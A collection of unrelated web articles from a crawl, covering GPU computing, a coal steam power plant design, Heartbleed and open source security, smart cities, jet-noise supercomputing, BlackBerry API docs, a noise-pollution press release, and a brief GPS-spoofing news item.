GPUs initially did not have ECC correctable memory, now they do. This, however, demonstrates their lack of general purpose computing requirements. You have to work hard to make it work and not every application is amenable. The memory structure of a GPU is meant to be optimal for sequential access, but many programs require non-unity stride which will reduce performance for those applications. Classical supercomputers from Cray, Convex, NEC, and Fujitsu had very high bandwidth, highly interleaved main memory. A GPU is not going to be a general-purpose or a wide-spread solution for technical and software reasons. You can only execute the “hot spot” on the GPU, for example, and still need a classical host like the x86. It is not an integrated system. And, as of now, GPUs do not support virtual memory.
The GPU is really just a contemporary version of an attached array processor. If you look at the last 30 years, the architectures that have succeeded in the long term have been the ones that are easiest to program and that fit into the current environment. New languages take time to be learned and adopted. Organizations can’t hire the right people to program the machines. Each new full-time equivalent programmer who has to be hired can easily add $200,000 to $300,000 to the costs of the new system per year. This is not a new phenomenon; it has been true for the past few decades. The time to reconfigure is really expensive.
HPCwire: You’ve said that “software is the ‘Trojan Horse’ of high-performance computing.” What do you mean by that?
Wallach: As an organization, you accept the hardware — the horse — and then the next day the software warriors pour out and devour your IT department. As technology enthusiasts, we get excited by new technologies based on peak performance micro-architecture and the software questions come later as well as questions about “how do I fit it into my environment?” and “will I be able to achieve this level of performance with my applications?”
This has been true for the last 30 and will be true for the next 30 years. If you go back to the 80s — you had all kinds of interesting technologies like array processors and others, but the ones that had the best software succeeded such as Convex, Cray and Alliant. They succeeded because the programmer could leverage the technology for their FORTRAN and C environments. Integrated solutions like these succeeded and companies like CDC failed because their software was part of an anemic development environment. As another example from the past, the Japanese (Fujitsu and NEC) had exceptional software environments.
Fast forward to today. It’s like déjà vu all over again. A lot of new technologies are evolving but are not dealing with the software environment. Previous FPGA vendors had this problem. They were not integrated with the host environment. Vector processors, such as ClearSpeed, have this problem and this is true of all accelerators and GPUs.
The GPUs have some great technologies for visualization, for example, but are not integrated. You have to learn how to program in new languages like CUDA and there aren’t a lot of major applications written in CUDA. Programmers have to re-code or set up source translators that facilitate FORTRAN to CUDA. There are no translators for FORTRAN to assembly code and from a technical perspective it is much more efficient to go from FORTRAN to assembly code. Source to source translators are NOT as efficient as compilation to assembly code.
HPCwire: You talk about Convey’s hybrid-core computer as being an application specific, low power node. What is the significance of this description to the market?
Wallach: In the past decade, every generation has added new, specific instructions to general purpose computers to speed performance. For example, the current x86 system enhances image processing and new instructions have been developed to enhance vector processing. Since clock cycles are basically flat, you will see the trend toward specific instructions built into the microprocessors increasing. If one instruction can replace 10 instructions, you will have reduced power for that application. Our view is that it is now time to step up and increase the functionality of this approach. We advocate having one instruction to replace 100 instructions. Now you don’t have to rely on clock cycles to increase performance. You are relying instead on data and control paths. This approach is extremely useful for Convey and allows us to significantly increase performance while reducing power requirements, footprint and overall facility costs for a data center.
HPCwire: In order to be successful, do you think new computing paradigms need to leverage existing eco-structures like Linux and Windows?
Wallach: Absolutely. As I said before, new languages mean higher costs and lower productivity. In VC deals, whenever I hear that you have to program in a new language to make it work, I turn it down.
With new computing paradigms, you get several benefits when they leverage existing eco-structures like Linux and Windows. First off, they are more easily acceptable in the marketplace. If I’m the data center manager, I don’t have to hire anyone new or have training for a new eco-structure. No need to program in OCCAM, for example. I call programs that don’t take into consideration legacy systems and that are obscenely difficult to integrate, “pornographic” programs — you can’t always describe them exactly, but you know them when you see them. In 1984, I converted a FORTRAN program from CDC to ANSI FORTRAN to see what they were doing and it was awful. In the contemporary world, CUDA is the new pornographic programming language.
In addition, Windows and Linux allow for adoption of related technologies from other industries without changing the programming environment. Industry innovators such as the researchers at Lawrence Berkeley National Laboratory believe, for example, that future supercomputers will use the processors found in cell phones and other hand-held devices. Why? Because they use so little energy and have proven that they can handle sophisticated tasks (October 2009, IEEE Spectrum: “Low-Power Supercomputers” ). It is easy for the manufacturers to build chips designed for specific HPC applications just like they build different chips for each Smartphone brand. Chip manufacturers will also provide the software — compilers, debuggers, profiling tools, even complete Linux operating systems — tailored to each specific chip they sell which will make the new systems easy to integrate into a current environment.
HPCwire: Last year in HPCwire you said the future of HPC involves improved software, in particular more widespread use of PGAS languages and optical interconnects. Is this still the case?
Wallach: Yes. I believe the need for optical interconnects increases as we build large systems. The efficiency of scaling in parallel processing has to do with bandwidth and latency. Optical interconnects are much more efficient in terms of speed and power as compared to copper. PGAS (partitioned global address space) languages allow programmers a global view of their dataset and are much more efficient. PGAS languages also make it much easier to program highly parallel systems — they are much better than MPI.
HPCwire: Speaking of software, where is Convey on its development of different software personalities?
Wallach: We are on track with our development of personalities. Convey’s personalities are application architectures and instruction sets that support a wide array of application-specific solutions. Rather than develop hundreds of unique applications, we a creating a manageable number of personalities that can be leveraged in hundreds of different ways. We’ve shipped a range of different personalities for different customers, and we’ve got several others in development.
In the end, we anticipate developing around a dozen different core personalities. This is consistent with what leading researchers have determined, also. For example, in the study published by the University of California at Berkeley, “The Landscape of Parallel Computing Research: A View from Berkeley,” researchers define what they call MOTIFs or computer application structures for HPC. They describe 13 computer application structures on the Y access with the X access representing a particular application and how it uses that structure. Berkeley’s view is consistent with ours that there are approximately a dozen different personalities that cover the full spectrum of computing. In our development, we add a third element to the equation — the memory system — and see this as a three-dimensional grid. For this case, a unity stride (access sequential elements — dense data); or a highly interleaved (access non-sequential elements — multiple independently accessible memory banks — sparse data); or a “smart” memory (PIM – perform specific operations in the memory system — thread based) system is required for optimal performance.
We are on track to have personalities with memory structure and instruction sets with these MOTIFs, which is where we believe computing is going. For the HC-1, we ultimately anticipate 13 MOTIFs — but some will use the same personality.
HPCwire: Convey has just started shipping production units, can you tell us about the company’s early customers and how they’re using the HC-1?
Wallach: Early applications for the HC-1 follow the classic profile of HPC applications: signal-image processing, computer simulations, bioinformatics, and other applications we can’t discuss at this time. We have HC-1s going into the world’s leading research labs, all of which we will talk about during SC09 at our booth.
You can catch up with Steve Wallach during SC09, where he is participating in a talk on “HPC Architectures: Future Technologies and Systems” from 1:30-2:00 p.m. on Thursday (Rm. E143-144); or at Convey’s booth (#2589). | <urn:uuid:2361415a-df63-40d7-a8a0-bafb1a8e8bf0> | CC-MAIN-2017-09 | https://www.hpcwire.com/2009/11/16/d_j_vu_all_over_again/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172831.37/warc/CC-MAIN-20170219104612-00628-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.948445 | 2,573 | 2.625 | 3 |
By now you've likely heard about the Heartbleed bug, a critical vulnerability that exposes potentially millions of passwords to attack and undermines the very security of the Internet. Because the flaw exists in OpenSSL—which is an open source implementation of SSL encryption—many will question whether the nature of open source development is in some way at fault. I touched based with security experts to get their thoughts.
Closed vs. Open Source
First, let’s explain the distinction between closed source and open source. Source refers to the source code of a program—the actual text commands that make the application do whatever it does.
Closed source applications don’t share the source code with the general public. It is unique, proprietary code created and maintained by internal developers. Commercial, off-the-shelf software like Microsoft Office and Adobe Photoshop are examples of closed source.
Open source, on the other hand, refers to software where the source code is available to the public. Open source projects are generally collaborative efforts because any developer is free to review the code, edit or enhance it, or add features. Popular examples of open source software include Linux, the Apache Web server, and OpenSSL.
Open source (in)security
When anyone is free to view the source code, and any developer can submit changes to the open source project, there are potential security concerns. Without properly vetting the developers, there is no way to know what—if any—secure development practices are being used, and the possibility exists for a malicious developer to intentionally introduce a vulnerability like Heartbleed for the express purpose of exposing the software to attack.
Does that mean that open source tools are inherently insecure, or less secure, than their closed source cousins?
“An argument could be made that the collaborative nature of open source software development compounds the challenge of ensuring security is considered throughout the software life cycle,” David Shearer, CISSP, PMP, and Chief Operating Officer of (ISC)2, said in a statement sent to PCWorld.
The security implications of what should be a simple diagnostic capability in OpenSSL is a prime example. According to Shearer, “One could go as far as to say that we may be heading toward a time where some of the key security architecture components that are available as open source software may need to be more closely managed and monitored.”
But while it's true that there are some security concerns unique to the collaborative nature of open source and to having the source code open to the general public, there are also ways that open source strengthens security.
"The advantage to open source is that it is so transparent that we can detect and fix quickly,” TK Keanini, CTO of Lancope says.
The truth is insecure code is not an open source vs. closed source debate. In spite of much tighter control of software development, and management of source code, crucial security flaws are still frequently discovered in commercial software that customers pay a lot of money for.
“Finger pointing at the open source development communities or persons or processes isn't going to fix the problem,” notes Andrew Storms, senior director of DevOps for CloudPassage. “Open source software along with commercial software will always have bugs.”
So, while it's natural to look for a scapegoat for a flaw of this magnitude, it would be foolish to dismiss the many benefits of open source in the name of security.
This story, "Is open source to blame for the Heartbleed bug?" was originally published by PCWorld. | <urn:uuid:cab03f1d-eb1e-48b4-ab90-0ee360a64c42> | CC-MAIN-2017-09 | http://www.csoonline.com/article/2142103/security/is-open-source-to-blame-for-the-heartbleed-bug.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174215.11/warc/CC-MAIN-20170219104614-00152-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.937828 | 735 | 3 | 3 |
Let's start with an example. I am going to pick Road-Usage Charging (RUC) as an example of a Smart solution, but in fact there are many solutions that exhibit the principle I am going to describe. Here are some easy steps:
- RUC systems are deployed to automate the collection of tolls for road segments, bridges, tunnels, and so forth. Local government like them because they are often sources of new revenue at relatively low cost. The business cases for these systems have very high ROI and the investment is often recovered in less than one year.
- RUC systems are relatively simple as IT systems. The basic challenge is to recognize vehicles as they pass through or under a gate. This can be based on an RFID device, e.g. the EZPass system on the east coast of the United States, or on license plate recognition, e.g. City of Stockholm, or a combination of the two, e.g. Singapore. This identification is mapped to an account and a charge transaction is made to the account. not too difficult in principle.
- However, what we have also created here is a stream of high resolution data on the movement of vehicles past well-defined locations in an urban area. Hundreds of thousands of touch points per day being generated free and mainly regarded as a kind of waste product from the business purpose of generating transactional charges.
- But there in information in that data and in 2007, the Singapore Land Transport Agency (LTA), which was an early adopter of RUC, asked IBM if that data could be used to predict incipient congestion in districts within the city. The mathematicians in IBM Research started looking at the data and although it did not provide complete coverage of the city, they were able to detect patterns of traffic density that are leading indicators for the onset of congestion. In fact, they were able to build predict models that with high accuracy give the city LTA as much as one hour of warning of the danger of congestion. An hour is sufficient time for the LTA traffic managers to change the timing of the traffic lights or to change the tolling for specific roads. The latter is a unique feature of the Singapore RUC.
- So here is the Smart Principle: 1) A system is deployed, often for transactional purposes. 2) A free by-product of the system is a dense stream of data about some aspect of the real-world. 3) This stream of data contains information about critical insights on what is going on in the real-world that can be extracted, in "real-time", by applying on-line analytical processing. 4) These insights enable the city managers to take better decisions about how to manage the operation of the city's infrastructure.
- RUCs are a great example, but in fact there are many such systems for energy, transportation, buildings, public safety and many other areas of city management. This accumulation of such systems in many cities over recent years creates what I call the Urban Digital Foundation - that sea of data, free data, that we can now tap for a very broad understanding of how to build a Smarter City. This is not to say that we never need to install new sensors. Water in particular is a domain that is strongly under-instrumented.
- See this IBM video (http://www.youtube.com/watch?v=sfEbMV295Kk) that describes a Smarter Planet view of the Internet of Things and illustrates this beautifully.
- The absence of this Urban Digital Foundation is what differentiates a potential Smarter City from others. In part it has to do with a rich communications infrastructure, but it largely has to do with the creation of these cost-free streams of data. When people challenge me to suggest what we could do to help some of the sprawling mega-cities such as Calcutta, my response is that there is little we can do until this Urban Digital Foundation is established. Without data there is no Smarter City.
That's all for now. Stay tuned. | <urn:uuid:69d85cbf-d105-4b96-afe8-c6401f48fa09> | CC-MAIN-2017-09 | https://www.ibm.com/developerworks/community/blogs/1d9bfc5f-e173-4598-aabc-e62b832282fa/entry/the_smart_principle_and_the_urban_digital_infrastructure1?lang=en | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171706.94/warc/CC-MAIN-20170219104611-00624-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.961886 | 833 | 2.890625 | 3 |
Stanford researchers said this week they had used a supercomputer with more than one million computing cores to predict the noise generated by a supersonic jet engine.
The researchers used the 1,572,864 processor Sequoia IBM Bluegene/Q system at Lawrence Livermore National Laboratories to run complex simulations that determined the physics of noise that are often impossible in the harsh exhaust environment of massive and powerful jet engines.
"The exhausts of high-performance aircraft at takeoff and landing are among the most powerful human-made sources of noise. For ground crews, even for those wearing the most advanced hearing protection available, this creates an acoustically hazardous environment. To the communities surrounding airports, such noise is a major annoyance and a drag on property values. Understandably, engineers are keen to design new and better aircraft engines that are quieter than their predecessors. New nozzle shapes, for instance, can reduce jet noise at its source, resulting in quieter aircraft," Stanford stated.
The researchers noted that with the advent of massive supercomputers boasting hundreds of thousands of computing cores, engineers been able to model jet engines and the noise they produce with accuracy and speed. Such fluid dynamics simulations test all aspects of a supercomputer. The waves propagating throughout the simulation require a carefully orchestrated balance between computation, memory and communication. Supercomputers like Sequoia divvy up the complex math into smaller parts so they can be computed simultaneously. The more cores you have, the faster and more complex the calculations can be, the researchers said.
"And yet, despite the additional computing horsepower, the difficulty of the calculations only becomes more challenging with more cores. At the one-million-core level, previously innocuous parts of the computer code can suddenly become bottlenecks," the researchers stated.
Check out these other hot stories: | <urn:uuid:a8433d22-2a89-4e3e-9116-edc66bac3f85> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2223944/data-center/stanford-consumes-million-core-supercomputer-to-spawn-supersonic-noise-forecast.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174276.22/warc/CC-MAIN-20170219104614-00500-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.93417 | 369 | 3.625 | 4 |
Since: BlackBerry 10.0.0
A class representing different input masking modes.
This class represents different input masking modes. You can use input masking to prevent characters that are typed in a text field from appearing. When input masking is enabled, typed characters appear as asterisks (*).
By default, users can toggle input masking on or off by using a toggle box inside the text control. You can prevent this by using either MaskedNotTogglable or NotMaskedNotTogglable.
Public Types Index
Specifies different masking modes.
- Default 0
The default masking mode.
- Masked 1
Indicates that masking is turned on.Since:
- NotMasked 2
Indicates that masking is turned off.Since:
- MaskedNotTogglable 3
Indicates that masking is turned on and that users can't toggle the masking mode.Since:
- NotMaskedNotTogglable 4
Indicates that masking is turned off and that users can't toggle the masking mode.Since: | <urn:uuid:a279c879-d414-4439-bee7-1fa577f5f6b1> | CC-MAIN-2017-09 | https://developer.blackberry.com/native/reference/cascades/bb__cascades__textinputmasking.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00092-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.71108 | 232 | 2.625 | 3 |
What email address or phone number would you like to use to sign in to Docs.com?
If you already have an account that you use with Office or other Microsoft services, enter it here.
Or sign in with:
Signing in allows you to download and like content, and it provides the authors analytical data about your interactions with their content.
Embed code for: ABSTRACT
Select a size
In this steam power plant we used coal (sub bituminous) which has les humidity and efficient , Easily available in Sindh areas such as THAR and LAKHRA.
SINDH: The Sindh province has total coal resources of 184 billion tonnes. The quality of coal is mostly lignite-B to sub-bituminous A-C.
THAR: A large coal-field, having a resource potential of about 175 billion tonnes, has been discovered at Thar in the eastern part of the province, about 400 km South East of Karachi.
BOILER: We have selected benson water tube boiler instead of fire tube boiler to minimize the pressure loss.
Boiler pressure :12 mpa
Super Heater Tmperature : 600 degree C
Turbine Exhaust Temperature : 90 Degree C
Mass flow rate of steam : 150 kg/sec
Steam Boiler Efficiency
The percentage of total heat exported by outlet steam in the total heat supplied by the fuel (coal) is called steam boiler efficiency.
It includes with thermal efficiency, combustion efficiency & fuel to steam efficiency. Steam boiler efficiency depends upon the size of boiler used. A typical efficiency of steam boiler is 80% to 88%. Actually there are some losses occur like incomplete combustion, radiating loss occurs from steam boiler surrounding wall, defective combustion gas etc. Hence, efficiency of steam boiler gives this result.
No of closed feed water heater: 2
No of open feed water heater: 1
No of reheaters : 3
Today, most of the electricity produced throughout the world is from Steam Power Plants .Steam Power Plant continuously converts the energy stored in fossil fuels (Coal, Oil, Natural Gas) into shaft work and ultimately into electricity .Steam has the advantage that, it can be raised from water which is available in abundance . it does not react much with the materials of the equipment of power plant o is stable at the temperature required in the plant.
Energy released by burning of fuel Q1 is transferred to water in Boiler Steam is generated (H2O(g)) at high pressure and Temperature .Steam expands in the Turbine (T) to a low pressure to produce shaft work WT .Steam leaving the Turbine (T) is condensed into water in the condenser (C)
In Condenser (C), Cooling water from a river or sea circulates carrying away the heat released during condensation Q2 .Water (Condensate) is fed back to the boiler by the pump (P) requiring power WP and cycle repeats .Working substance (Water)is undergoing a Cyclic Process → No change in its Internal Energy over the cycle: ∫ dE =0
A steam power plant is a power station in which the electric generator is steam driven. Water is heated, turns into steam and spins a steam turbine. After it passes through the turbine, the steam is condensed in a condenser. The greatest variation in the design of steam- electric power plants is due to the different fuel sources. Almost all coal, nuclear, geothermal, solar thermal electric power plants, waste incineration plants as well as many natural gas power plants are steam-electric. Natural gas is frequently combusted in gas turbines as well as boilers. The waste heat from a gas turbine can be used to raise steam, in a combined cycle plant that improves overall efficiency. Worldwide, most electric power is produced by steam-electric power plants, which produce about 86% of all electric generation. The only other types of plants that currently have a significant contribution are hydroelectric and gas turbine plants, which can burn natural gas or diesel. Photovoltaic panels, wind turbines and binary cycle geothermal plants are also non- steam electric, but currently do not produce much electricity. Reciprocating steam engines have been used for mechanical power sources since the 18th Century, with notable improvements being made by James Watt. The very first commercial central electrical generating stations in New York and London, in 1882, also used reciprocating steam engines. As generator sizes increased, eventually turbines took over due to higher efficiency and lower cost of construction. By the 1920s any central station larger than a few thousand kilowatts would use a turbine prime mover. After electricity is generated, it has to be moved to customers that use the electricity. This involves two basic steps: transmission (moving electricity at high voltages from generating plants to local communities) and distribution (moving power to individual customers). The transmission system carries electricity from the power plant to local communities, often over long distances. Electricity does not travel easily. Transmission lines have some resistance to the flow of electricity (this is similar to the friction caused by the flow of water in a pipe). This causes them to lose a portion of the electricity they transport. Early in the history of electricity transmission systems energy developers discovered that the higher the voltage in electricity lines, the less resistance and, therefore, the less wasted electricity. That’s why when electricity travels long distances, it is better to have it at higher voltages.
Heat transfer in Steam Generator normally takes place in 3 steps
Economiser : Sensible heating in liquid Phase till it becomes saturated Liquid.
Evaporator : Phase change by absorbing Latent Heat of Vaporization.
Superheater : Sensible heating of vapor to become Super Heated Vapor.
Flue gas is the
https://en.wikipedia.org/wiki/Gasgas exiting to the atmosphere via a
https://en.wikipedia.org/wiki/Flueflue, which is a pipe or channel for conveying exhaust gases from a fireplace, oven,
https://en.wikipedia.org/wiki/Boiler_(steam_generator)steam generator. Quite often, the flue gas refers to the
https://en.wikipedia.org/wiki/Combustioncombustion exhaust gas produced at
https://en.wikipedia.org/wiki/Power_plantspower plants. Its composition depends on what is being burned, but it will usually consist of mostly
https://en.wikipedia.org/wiki/Nitrogennitrogen (typically more than two-thirds) derived from the combustion of air,
https://en.wikipedia.org/wiki/Carbon_dioxidecarbon dioxide (CO2), and
https://en.wikipedia.org/wiki/Water_vaporwater vapor as well as excess
https://en.wikipedia.org/wiki/Oxygenoxygen (also derived from the combustion air). It further contains a small percentage of a number of pollutants, such as
https://en.wikipedia.org/wiki/Atmospheric_particulate_matterparticulate matter (like
https://en.wikipedia.org/wiki/Nitrogen_oxidesnitrogen oxides, and sulfur oxides.
For environmental safety when ashes are produced these ashes are in two forms, the wet ash will settle down while the other fly ash and flue gases will be passed through economizer which will send them forward towards Electro static precipitator which will direct them towards chimney , In chimney with a spray of water these gases can be conducted which will not let them go to environment .
If these gases goes to environment can cause many problems such as ozone depletion etc.
Coal fired thermal power plants meet the growing energy demand, and hencespecial attention must be given to define a strategy for the optimization of thesesystems. Energy analysis presented for a coal fired thermal power plant hasprovided information on the irreversibilities of each process.
This steam power plant gives us efficiency of 47% ,This steam power plant is friendly to our environment , This steam power plant has a capacity of 249 MW , In Sindh this steam power plant is is being under construction by Chinese company which will be fully constructed to next year , and that power plant will have the capacity to cover 1 whole city. The very first commercial central electrical generating stations in New York and London, in 1882, also used reciprocating steam engines. As generator siz | <urn:uuid:3a762117-41b7-4631-962c-d01eca85af9a> | CC-MAIN-2017-09 | https://docs.com/ammar-ali/3256/abstract | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00092-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.926857 | 1,743 | 2.875 | 3 |
By Ann Silverthorn
—According to a recent end-user survey, which included a section on "green" initiatives, nearly three-fourths of the respondents have an interest in adopting a green data-center initiative, yet only one in seven has successfully done so. For the purpose of the study, a green data center was defined as having increased efficiencies in energy usage, power consumption, and space utilization, as well as a reduction in polluting energy sources.
Conducted by Ziff Davis on behalf of Symantec, the study surveyed 800 data-center managers across 14 countries, most of which were Global 2000 organizations and other large companies.
In the US, only about one-third of the companies have adopted green policies. However, many US companies are making progress with the Green Grid, which is a consortium of IT vendors and users seeking to lower the overall consumption of power in data centers. The organization is chartered to develop platform-neutral standards, measurement methods, processes, and new technologies to improve energy efficiency.
Green Grid board members include AMD, APC, Dell, Hewlett-Packard, IBM, Intel, Microsoft, Rackable Systems, Spray Cool, Sun, and VMware. Contributing members include nearly 30 vendors, including storage vendors such as Copan and Pillar Data Systems. General members, which number 75, include storage vendors such as Nexsan, Sepaton, and Storwize.
In the Symantec survey, 85% of the respondents said energy efficiency is at least a moderate priority in their data centers, with 15.5% citing it as a critical priority.
Marty Ward, director of NetBackup product marketing at Symantec, says the numbers are not surprising because, "a lot of thought is being put into it and not enough action." However, Ward is encouraged that almost three-fourths of the respondents are at least thinking about going green.
When considering approaches to making data centers greener, managers have many choices in both software and hardware. They may even decide on an entire data-center redesign. According to Ward, technologies such as data de-duplication and creating a tiered storage architecture are examples of technologies that can dramatically reduce energy consumption.
In addition, there are a variety of projects that constitute green policies (see figure, below).
Reducing the data footprint | <urn:uuid:cede9f89-8448-40b0-b715-ddae770dad93> | CC-MAIN-2017-09 | http://www.infostor.com/index/articles/display/312697/articles/infostor/top-news/survey-reveals-green-initiatives-or-lack-thereof.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170613.8/warc/CC-MAIN-20170219104610-00268-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.961527 | 484 | 2.625 | 3 |
Solar Eclipse from Space
/ March 12, 2013
The latest transmissions from NASA's Solar Dynamics Observatory (SDO), which took off in 2010 for its five-year mission to observe solar activity, shows the sun partially blocked from view by the Earth -- and the moon.
Such solar eclipses will be regular occurences for the next three weeks, cnet.com reported, when the Earth blocks the SDO's view of the sun for a period of time each day.
The photo above was taken on Monday, March 11, and shows the moon crossing in front of the sun.
Photo courtesy of NASA/SDO | <urn:uuid:75969494-d65c-426c-9cc2-ca7058650aa5> | CC-MAIN-2017-09 | http://www.govtech.com/photos/Photo-of-the-Week-Solar-Eclipse-from-Space.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171078.90/warc/CC-MAIN-20170219104611-00620-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.943128 | 129 | 3.078125 | 3 |
Development of Smart Cities
Smart cities are slowly becoming a reality; slowly on a global level, but for those cities determined to implement the necessary smart infrastructure, connected technology is often very rapidly impacting industrial, commercial and residential environments. Municipalities determined to implement smart technology both to save money and improve the lives of residents believe that initial capital outlay will show positive returns in both drawing leading businesses to the area and improving overall local administration. But in some places, the move towards smart cities is far more dramatic; Australia has recently announced a $50 million R&D program aimed at inspiring smart city innovations, a four-year plan intended to improve life in cities and suburbs through technology and open data, and with a backing of $31 million Scotland’s seven major cities are banding together for the development of several smart city projects.
The Future of Smart Cities
In the recent exploration of how IoT tech is likely to transform cities at the Gartner Symposium/ITxpo 2016 Gartner analysts suggested that by 2020 climate change, resilience and sustainability KPIs will feature in half of all smart city objectives. Says Bettina Tratz-Ryan, research vice president at Gartner, “With the Horizon 2020 goals of energy efficiency, carbon emission reductions and renewable energy in mind, many cities in Europe have launched energy sustainability, resource management, social inclusion and community prosperity initiatives.” Tratz-Ryan further suggests that thanks to Internet of Things (IoT) technology’s ability to analyze data contextually, the development of smart city execution can be accelerated.
Sensors are already at the heart of smart cities, and Gartner predicts that next year approximately 380 million connected things will be in use in cities helping meet climate change and sustainability goals; by 2020 we can expect a spectacular increase to 1.39 billion connected things. Says Tratz-Ryan, “The uptake of ride sharing, the electrification of public transportation, the support infrastructure for e-vehicles and congestion charging for combustion engines, all of those examples are driving cleaner air, producing fewer GHG emissions and saving energy, while improving the noise levels and ambiance on streets.”
We can also expect to see intelligent streetlights helping cities meet energy targets as well as BMS systems that could potentially halve energy consumption through better management of lighting, heating, and cooling.
The Benefits of Smart City Living
On a more personal level, the benefits of living in a smart city sometimes seem distant, and we’re not likely to notice the small changes taking place right away. However, once the coordination of smart devices is properly implemented, with lighting, traffic signaling and updating, venue and event synchronization, and the likes in place, the results could be dramatic. Today, some of the most recognized benefits of well-functioning smart cities include healthier communities, smart development, and sustainability.
(Image Source: http://www.libelium.com)
For the cities committed to improving public transport networks and Wi-Fi accessibility, results of reduced pollution and obesity levels are being reported along with citizens claiming a greater sense of engagement with their towns. And those cities implementing IoT and smart city networks are finding it easier to attract new residents thanks to cheaper living costs through both lowered utility and transport bills as well as improved social and cultural energy thanks not only to cleaner air but a burgeoning vibrant city life. Businesses, too, prefer cities with smart infrastructure thanks to reduced operating costs and it’s expected that the spending by the global business community towards incorporating smart technologies into buildings will be in the billions in 2017. Finally, with IoT tech enhancing usage of resources such as fuel, energy, water, and waste, environmental savings and sustainability receive a much-needed advance; IoT-driven smart lighting and water programs are already saving smart cities many millions of dollars each year.
Though some are lucky enough to live already in smart cities, most of us still have a bit of a wait; fortunately, the trend toward government participation and investment in such innovation has already begun.
By Jennifer Klostermann | <urn:uuid:523ba559-a313-4c1b-b480-ad72fcbeeae4> | CC-MAIN-2017-09 | https://cloudtweaks.com/2016/12/development-of-smart-cities/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172018.95/warc/CC-MAIN-20170219104612-00496-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.940264 | 832 | 2.84375 | 3 |
BEAVERTON, OR--(Marketwire - Dec 5, 2012) - The amounts of sustained noise people are subjected to in everyday life have reached unsafe levels, according to a new report authored by leading sound experts and published today. Building in Sound, developed by Biamp Systems in collaboration with acoustics expert and TED speaker Julian Treasure, reports that everyday noise levels regularly exceed World Health Organization's (WHO) recommended levels. The study draws clear links between excessive noise and poor acoustics and ill-health, distraction and loss of productivity, even disruption to educational development.
Drawing on a variety of academic, government and industry body sources, the paper has identified the economic and social impacts noise can have on everyday life -- whether in a city, at work, in a classroom or hospital.
Examples of the sort of noise levels urban populations are regularly exposed to include:
- An air conditioning unit puts out sounds of 55 decibels. At this level, sleep is impaired and the risk of heart disease increases. Yet an average busy office has been recorded at 65 decibels.
- Street traffic has been recorded at 70 decibels. Regular unprotected exposure to the same level of noise can lead to permanent hearing loss.
- The average noise of a motorway is around 85 decibels, the same point at which US Federal Law mandates hearing protection for prolonged exposure.
The study also looks at much needed solutions to the issues -- given that road traffic noise is estimated to cost between 30 and 46 billion Euros a year ($39 and 60 billion USD a year), or 0.4% of GDP in the European Union.1 It calls for an integrated approach to acoustic design that incorporates cutting edge sound technology with a more thoughtful approach to architectural design and construction. Properly executed, managing sound can lead to higher employee productivity and job satisfaction, lower crime rates in urban environments, and increased sales in business.
"Noise is a major threat to our health and productivity -- but until now we have been largely unconscious of its effects because of our obsession with how things look," says Julian Treasure, chairman of The Sound Agency. "We need to start designing with our ears, creating buildings and public spaces that sound as good as they look. If we do that, we can transform the productivity and wellbeing of office workers, patients in hospitals and children in schools, among many others."
"This isn't a call for silence, but an appeal to start considering the effects poorly managed sound can have," says Graeme Harrison, vice president of marketing at Biamp Systems. "The right sound and acoustics can transform education, healthcare and work, but we have to address the problem now because it's only going to become more difficult in the future. We have the technology and expertise to manage the acoustics of new and existing environments, but now's the time to act and build in sound."
The full report and infographic are available for download here.
About Biamp Systems
Biamp Systems is a leading provider of innovative, networked media systems that power the world's most sophisticated audio/video installations. The company is recognized worldwide for delivering high-quality products and backing each product with a commitment to exceptional customer service. Industry collaboration and education lie at the heart of Biamp's philosophy. The company is a founding member of the AVnu Alliance, the industry body dedicated to developing standards for professional-quality networked audio and video systems, and it was the first US manufacturer to certify a networked audio solution as EN 54-16 compliant.
The award-winning Biamp product suite includes the Tesira® media system for digital audio networking, Audia® Digital Audio Platform, Nexia® digital signal processors, Sona™ AEC algorithm and Vocia® Networked Public Address and Voice Evacuation System. Each has its own specific feature set that can be customized and integrated in a wide range of applications, including corporate boardrooms, conference centers, performing arts venues, courtrooms, hospitals, transportation hubs, campuses and multi-building facilities.
Founded in 1976, Biamp is headquartered in Beaverton, Oregon, USA, with additional engineering operations in Brisbane, Australia. For more information on Biamp, please visit www.biamp.com.
About Julian Treasure
Julian Treasure is chairman of The Sound Agency, a UK-based consultancy that helps clients achieve better results by optimising the sound they make in every aspect of business. He is also the author of the book Sound Business, the first map of the exciting new territory of applied sound for business. Mr. Treasure has been widely featured in the world's media and conferences, including TED. His four TED talks have been viewed an estimated four million times. His latest talk is on why architects need to use their ears.
1 SILENCE - Recommendations: Practitioner Handbook for Local Noise Action Plans: European Commission Sixth Framework Programme | <urn:uuid:2a6320cf-4330-41f8-9259-6b26b7fa69d5> | CC-MAIN-2017-09 | http://www.marketwired.com/press-release/biamp-systems-releases-report-on-the-hazardous-levels-of-noise-in-everyday-life-1733911.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173866.98/warc/CC-MAIN-20170219104613-00020-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.951168 | 998 | 2.859375 | 3 |
A group of students at the University of Texas at Austin built and successfully tested a GPS spoofing device to remotely redirect an $80 million yacht onto a different route, the Houston Chronicle reports. The project, which was completed with the permission of the yacht's owners in the Mediterranean Sea this past June, is explained in the video below.
